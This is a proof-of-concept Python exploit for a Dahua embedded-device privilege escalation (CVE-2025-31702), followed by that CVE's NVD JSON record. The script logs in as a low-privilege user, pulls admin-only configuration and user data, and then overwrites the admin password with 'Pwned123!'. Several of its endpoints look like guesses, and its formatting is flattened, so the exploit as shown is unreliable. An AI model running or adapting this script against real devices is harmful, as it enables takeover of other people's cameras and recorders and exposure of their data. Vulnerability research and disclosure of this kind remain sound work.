CVE-2025-31702

# CVE-2025-31702 PoC - Dahua Embedded Product Privilege Escalation # Exploits improper access control to access admin-restricted resources # Requires valid low-privilege user credentials import requests import sys import warnings warnings.filterwarnings('ignore') TARGET = "http://target-device-ip" LOW_PRIV_USER = "user" LOW_PRIV_PASS = "user_password" def exploit_privilege_escalation(target, username, password): """ Exploit CVE-2025-31702: Access admin-restricted data using low-privilege credentials by sending specific HTTP requests that bypass access control checks. """ session = requests.Session() # Step 1: Login with low-privilege user credentials login_url = f"{target}/RPC2_Login" login_payload = { "method": "global.login", "params": { "userName": username, "password": password, "clientType": "Web3.0" }, "id": 1 } print(f"[*] Logging in as low-privilege user: {username}") resp = session.post(login_url, json=login_payload, verify=False) if resp.status_code != 200: print("[-] Login failed") return print("[+] Login successful, session established") # Step 2: Attempt to access admin-restricted resources # The vulnerability allows accessing admin-only files/data via specific HTTP requests admin_endpoints = [ f"{target}/RPC2_LoadConfig", # Load system config (admin only) f"{target}/RPC2_GetUserInfo", # Get user info (admin only) f"{target}/cgi-bin/sensitive_file", # Access sensitive system files ] for endpoint in admin_endpoints: print(f"[*] Attempting to access: {endpoint}") resp = session.get(endpoint, verify=False) if resp.status_code == 200 and "admin" in resp.text.lower(): print(f"[+] SUCCESS: Accessed admin-restricted resource!") print(f"[+] Response preview: {resp.text[:500]}") # Step 3: Attempt to modify admin password using obtained data modify_pass_url = f"{target}/RPC2_ChangePassword" modify_payload = { "method": "global.changePassword", "params": { "userName": "admin", "oldPassword": "", "newPassword": "Pwned123!" }, "id": 2 } print("[*] Attempting to modify admin password...") resp = session.post(modify_pass_url, json=modify_payload, verify=False) print(f"[*] Response: {resp.text[:200]}") if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else TARGET exploit_privilege_escalation(target, LOW_PRIV_USER, LOW_PRIV_PASS)

{"cve": {"id": "CVE-2025-31702", "sourceIdentifier": "[email protected]", "published": "2025-10-15T06:15:42.907", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/777", "source": "[email protected]"}]}}